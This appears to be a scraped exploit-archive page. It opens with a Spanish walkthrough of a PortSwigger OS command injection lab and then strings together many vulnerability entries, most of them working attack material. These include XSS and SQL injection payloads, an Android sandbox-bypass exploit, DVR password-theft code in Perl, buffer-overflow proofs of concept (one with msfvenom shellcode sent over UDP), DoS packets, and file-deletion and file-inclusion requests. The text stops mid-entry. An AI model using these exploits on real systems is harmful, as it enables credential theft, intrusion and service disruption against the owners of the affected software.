HireHackking

En este post vamos a estar resolviendo el laboratorio de PortSwigger: “OS command injection, simple case”. Para resolver el laboratorio, tenemos que ejecutar el comando whoami en el servidor. Para ello, tenemos que hacer uso del OS Command Injection que se encuentra en la comprobación de stock de los productos. Por lo que vamos a dirigirnos a un producto cualquiera de la web: Dentro del producto elegido, podemos ver como tiene un apartado para comprobar el stock: Si damos click: Simplemente, se nos mostrará el stock del producto. Ahora bien, vamos a interceptar la petición que hace el cliente al darle click a este botón, a su vez, preparamos el burp suite para recibirla: Una vez interceptada la petición, la mandamos al Repeater pulsando Ctrl R: Como vemos, es una petición normal. Sin embargo, vamos a probar a cambiar el valor del storeId: Vemos un error de sh, lo que quiere decir que el valor del storeId se está pasando a un programa de Linux. Sabiendo esto, podemos probar a hacer un OS Command Injection bastante simple: En este caso, simplemente usando un punto y coma para separar el valor para que se trate como otro comando nos sirve para aislar el comando whoami de lo anterior y que se ejecute. De esta forma, conseguimos resolver el laboratorio:

source: https://www.securityfocus.com/bid/48951/info Skype is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Skype 5.3.0.120 and prior are vulnerable; other versions may also be affected. The following sample input is available: "><iframe src='' onload=alert('mphone')> A video demonstrating the attack is available. Please see the references for more information.

source: https://www.securityfocus.com/bid/48954/info Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox. Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain. Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. public class CasExploit extends Activity { static final String mPackage = "com.android.browser"; static final String mClass = "BrowserActivity"; static final String mUrl = "http://target.domain/";; static final String mJavascript = "alert(document.cookie)"; static final int mSleep = 15000; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); startBrowserActivity(mUrl); try { Thread.sleep(mSleep); } catch (InterruptedException e) {} startBrowserActivity("javascript:" + mJavascript); } private void startBrowserActivity(String url) { Intent res = new Intent("android.intent.action.VIEW"); res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass)); res.setData(Uri.parse(url)); startActivity(res); } }

source: https://www.securityfocus.com/bid/48952/info The MyTabs plugin for MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

source: https://www.securityfocus.com/bid/48955/info AzeoTech DAQFactory is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause the application to crash, denying service to legitimate users. Versions prior to DAQFactory 5.85 are vulnerable. The following exploit requests are available: preamble: "\x01\x00\x09\x00CPassword\x00" reboot: "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00" shutdown: "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

source: https://www.securityfocus.com/bid/48966/info Gilnet News is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. http://www.example.com/[PATH]/read_more.php?id=[Injection]

source: https://www.securityfocus.com/bid/48967/info mt LinkDatenbank is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E

source: https://www.securityfocus.com/bid/48969/info BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script>

source: https://www.securityfocus.com/bid/48981/info The 'Slideshow Gallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_xeslidegalfx&Itemid=&func=detail&id=1

source: https://www.securityfocus.com/bid/48970/info Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/name.asp?id=[SQLInjection]

source: https://www.securityfocus.com/bid/48982/info foomatic-gui is prone to a remote arbitrary shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary shell commands in the context of the application. Versions prior to foomatic-gui 0.7.9.5 are vulnerable. netbios name = oh'notquotezSIF to /etc/samba/smb.conf

#!/usr/bin/perl # # LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # # # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ #### # # Digital video recorder (DVR) surveillance is the use of cameras, # often hidden or concealed, that use DVR technology to record # video for playback or immediate viewing. As technological # innovations have made improvements in the security and # surveillance industry, DVR surveillance has become more # prominent and allows for easier and more versatile security # systems in homes and businesses. A DVR surveillance security # system can be designed for indoor use or outdoor use and can # often involve hidden security cameras, concealed “nanny cams” # for home security, and even personal recording devices hidden # on a person. # #### # # Description: # No authentication (login) is required to exploit this vulnerability. # This program demonstrates how unpatched security bug would enable # hackers to gain control of a vulnerable device while sitting # behind their keyboard, potentially thousands of miles away. # An unauthenticated attacker that is connected to the DVR's may be # able to retrieve the device's administrator password allowing them # to directly access the device's configuration control panel. # #### # # Disclaimer: # This or previous programs is for Educational purpose ONLY. Do not # use it without permission.The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # #### # Use them at your own risk! #### # # $ perl lg.pl 133.7.133.7:80 # LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # u/p: admin/000000 # u/p: user1/000000 # u/p: user2/000000 # u/p: user3/000000 # u/p: LOGOUT/000000 # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # #### use LWP::Simple; print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n"; if (@ARGV == 0) {&usg; &foot;} while (@ARGV > 0) { $t = shift(@ARGV); } my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!"); for (my $i=0; $i <= 4; $i++){ if ($r =~ m/<name>(.*)<\/name>/g){ print " u\/p: $1\/"; } if ($r =~ m/<pw>(.*)<\/pw>/g){ print "$1\n"; } } &foot; sub usg(){ print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n"; } sub foot(){ print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n"; print " http://www.ethical-hacker.org/\n"; exit; }

source: https://www.securityfocus.com/bid/48983/info The 'com_community' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_community&view=profile&userid=156

source: https://www.securityfocus.com/bid/49009/info The WP e-Commerce plug-in for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WP e-Commerce 3.8.6 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/wp-e-commerce/wpsc-theme/wpsc-cart_widget.php?cart_messages[]=%3Cimg%20src=1% 20onerror=javascript:alert%28document.cookie%29%3E

source: https://www.securityfocus.com/bid/49008/info HESK is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. HESK 2.2 is vulnerable; other versions may also be affected. http://www.example.com/inc/header.inc.php?hesk_settings[tmp_title]=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E http://www.example.com/inc/header.inc.php?hesklang[ENCODING]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/inc/assignment_search.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E http://www.example.com/inc/attachments.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/inc/common.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/inc/database.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/inc/prepare_ticket_search.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E http://www.example.com/inc/print_tickets.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/inc/show_admin_nav.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3 E http://www.example.com/inc/show_search_form.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E http://www.example.com/inc/ticket_list.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/language/en/text.php/%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/49007/info Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. $ touch y # The unrelated victim file $ gzip -c </dev/null >'" y ".pdf.gz' # Create a .pdf.gz file $ xpdf '" y ".pdf.gz' # View it using xpdf Error: May not be a PDF file (continuing anyway) Error: PDF file is damaged - attempting to reconstruct xref table... Error: Couldn't find trailer dictionary Error: Couldn't read xref table rm: cannot remove `/tmp/': Is a directory $ ls -l y # The victim file is gone! ls: cannot access y: No such file or directory

source: https://www.securityfocus.com/bid/49022/info Community Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Community Server 2007 and 2008 are vulnerable; other versions may also be affected. http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS]

source: https://www.securityfocus.com/bid/49033/info Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information. https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=

# Exploit Title: Radexscript CMS 2.2.0 - SQL Injection vulnerability # Google Dork: N/A # Date: 02/09/2015 # Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn) # Vendor Homepage: http://redaxscript.com/ # Software Link: http://redaxscript.com/download/releases # Version: Redaxscript 2.2.0 # Tested on: Linux # CVE : CVE-2015-1518 :: PROOF OF CONCEPT :: POST /redaxscript/ HTTP/1.1 Host: target.local User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 96 search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search - Vulnerable parameter: $search_terms - Vulnerable file: redaxscript/includes/search.php - Vulnerable function: search_post() - Vulnerable code: function search_post() { /* clean post */ if (ATTACK_BLOCKED < 10) { $search_terms = clean($_POST['search_terms'], 5); } /* validate post */ if (strlen($search_terms) < 3 || $search_terms == l('search_terms')) { $error = l('input_incorrect'); } /* query results */ else { $search = array_filter(explode(' ', $search_terms)); $search_keys = array_keys($search); $last = end($search_keys); /* query search */ $query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1'; if ($search) { $query .= ' && ('; foreach ($search as $key => $value) { $query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\''; if ($last != $key) { $query .= ' || '; } } $query .= ')'; } $query .= ' ORDER BY date DESC LIMIT 50'; $result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray(); $num_rows = count($result); if ($result == '' || $num_rows == '') { $error = l('search_no'); } /* collect output */ else if ($result) { $accessValidator = new Redaxscript\Validator\Access(); $output = '<h2 class="title_content title_search_result">' . l('search') . '</h2>'; $output .= form_element('fieldset', '', 'set_search_result', '', '', '<span class="title_content_sub title_search_result_sub">' . l('articles') . '</span>') . '<ol class="list_search_result">'; foreach ($result as $r) { $access = $r['access']; /* if access granted */ if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED) { if ($r) { foreach ($r as $key => $value) { $$key = stripslashes($value); } } /* prepare metadata */ if ($description == '') { $description = $title; } $date = date(s('date'), strtotime($date)); /* build route */ if ($category == 0) { $route = $alias; } else { $route = build_route('articles', $id); } /* collect item output */ $output .= '<li class="item_search_result">' . anchor_element('internal', '', 'link_search_result', $title, $route, $description) . '<span class="date_search_result">' . $date . '</span></li>'; } else { $counter++; } } $output .= '</ol></fieldset>'; /* handle access */ if ($num_rows == $counter) { $error = l('access_no'); } } } /* handle error */ if ($error) { notification(l('something_wrong'), $error); } else { echo $output; } } :: SOLUTION :: Update to Redaxscript 2.3.0 ::INFORMATION DISCLOSURE:: - 11/27/2014: Inform the vendor - 11/28/2014: Vendor confirmed - 01/29/2015: Vendor releases patch - 01/05/2015: ITAS Team publishes information :: REFERENCE :: - http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-redaxscript-2-2-0-cms-75.html ::COPYRIGHT:: Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn). :: DISCLAIMER :: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

#!/usr/bin/env python ########################################################################################## # Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC # Date Discovered: 09-02-2015 # Exploit Author: Samandeep Singh ( SaMaN - @samanL33T ) # Vulnerable Software: Moo player 1.3.0 # Software Link: https://mooplayer.jaleco.com/ # Vendor site: https://mooplayer.jaleco.com/ # Version: 1.3.0 # Tested On: Windows XP SP3, Win 7 x86. ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## # After the execution of POC, the SEH chain looks like this: # 01DDF92C ntdll.76FF71CD # 01DDFF5C 43434343 # 42424242 *** CORRUPT ENTRY *** # And the Stack # 01DDFF44 41414141 AAAA # 01DDFF48 41414141 AAAA # 01DDFF4C 41414141 AAAA # 01DDFF50 41414141 AAAA # 01DDFF54 41414141 AAAA # 01DDFF58 41414141 AAAA # 01DDFF5C 42424242 BBBB Pointer to next SEH record # 01DDFF60 43434343 CCCC SE handler # 01DDFF64 00000000 .... # 01DDFF68 44444444 DDDD # 01DDFF6C 44444444 DDDD # 01DDFF70 44444444 DDDD # And the Registers # EAX 00000000 # ECX 43434343 # EDX 76FF71CD ntdll.76FF71CD # EBX 00000000 # ESP 01DDF918 # EBP 01DDF938 # ESI 00000000 # EDI 00000000 # EIP 43434343 head="http://" buffer=10000 junk="\x41" * 264 nseh = "\x42" * 4 seh = "\x43" * 4 poc = head + junk + nseh + seh junk1 = "\x44"*(buffer-len(poc)) poc += junk1 file = "mooplay_poc.m3u" f=open(file,"w") f.write(head + poc); f.close(); #SaMaN(@samanL33T)

#!/usr/bin/python # Author KAhara MAnhara # Achat 0.150 beta7 - Buffer Overflow # Tested on Windows 7 32bit import socket import sys, time # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python #Payload size: 512 bytes buf = "" buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62" buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50" buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b" buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63" buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61" buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e" buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57" buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e" buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71" buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62" buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49" buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72" buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51" buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54" buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d" buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b" buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b" buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49" buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44" buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52" buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b" buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64" buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30" buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79" buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48" buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d" buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70" buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30" buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63" buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50" buf += "\x65\x6d\x30\x41\x41" # Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) server_address = ('192.168.91.130', 9256) fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00" p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46) p += "\x62" + "A"*45 p += "\x61\x40" p += "\x2A\x46" p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43" p += "\x61\x43" + "\x2A\x46" p += "\x2A" + fs + "C" * (157-len(fs)- 31-3) p += buf + "A" * (1152 - len(buf)) p += "\x00" + "A"*10 + "\x00" print "---->{P00F}!" i=0 while i<len(p): if i > 172000: time.sleep(1.0) sent = sock.sendto(p[i:(i+8192)], server_address) i += sent sock.close()

Document Title: =============== Chemtool 1.6.14 Memory Corruption Vulnerability Date: ============= 08/02/2015 Vendor Homepage: ================ http://ruby.chemie.uni-freiburg.de/~martin/chemtool/ Abstract Advisory Information: ============================== Memory Corruption Vulnerability on Chemtool 1.6.14. Affected Product(s): ==================== Chemtool 1.6.14 or older Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An attacker can crash the software by using an input file. Also, an attacker can crash the software by entering a filename too long. b77a8000-b77a9000 r--s 00000000 08:01 152558 /var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4 b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user b77aa000-b77bb000 r-xp 00000000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bb000-b77bc000 r--p 00010000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bc000-b77bd000 rw-p 00011000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bd000-b77be000 rwxp 00000000 00:00 0 b77be000-b77bf000 r--p 00855000 08:01 274691 /usr/lib/locale/locale-archive b77bf000-b77c0000 r--p 00596000 08:01 274691 /usr/lib/locale/locale-archive b77c0000-b77c2000 rw-p 00000000 00:00 0 b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso] b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so bfeff000-bff21000 rw-p 00000000 00:00 0 [stack] Aborted (core dumped) Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local attackers with userinteraction. First test. Attacker can generate a malicious file (format .png).This file can produced a Stack Smashing. #/usr/bin/ruby buf = "a"*3000 filename = "crash.png" file = open(filename,'w') file.write(buf) file.close puts "file created!" Second test. Attacker can enter a filename too long. For example, this program needs recieve a parameter. If this parameter is too long, It will crash. $chemtool $(perl -e 'print "A"x900') How to perform: ======================= 1) You can test it with gdb. You attach this application. 2) Run it, now, you can move "crash.png" file that we generated by our ruby script to the application. Also, you can run argv[1] with a long value. When you perform above steps so application will crash. Analyze it on gdb. Solution - Fix & Patch: ======================= Restrict working maximum size. I believe that this bug doesn't have solution. Security Risk: ============== The security risk of the vulnerability is estimated as medium because of the local crash method. Authors: ================== Pablo González

 u5CMS 3.9.3 (deletefile.php) Arbitrary File Deletion Vulnerability Vendor: Stefan P. Minder Product web page: http://www.yuba.ch Affected version: 3.9.3 and 3.9.2 Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache. Desc: Input passed to the 'f' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected GET parameter. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5226 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5226.php 29.12.2014 --- Target: C:\deleteme.txt ----------------------- GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=/deleteme.txt HTTP/1.1 GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../../../../../../deleteme.txt HTTP/1.1

 u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities Vendor: Stefan P. Minder Product web page: http://www.yuba.ch Affected version: 3.9.3 and 3.9.2 Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache. Desc: Input passed via multiple parameters in multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5225 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php 29.12.2014 --- 1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1 name=album[INJECT] 2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1 3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1 4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&uri=metai.php HTTP/1.1 5. GET /u5cms/u5admin/metai.php?typ=a&name=album[INJECT] HTTP/1.1 6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1 7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1 name=test[INJECT]&typ=e 8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1 name=album2[INJECT]&ulinks=yes 9. GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum2[INJECT]&typ=a HTTP/1.1

 u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability Vendor: Stefan P. Minder Product web page: http://www.yuba.ch Affected version: 3.9.3 and 3.9.2 Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache. Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'f' parameter to thumb.php script is not properly verified before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5224 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php 29.12.2014 --- GET 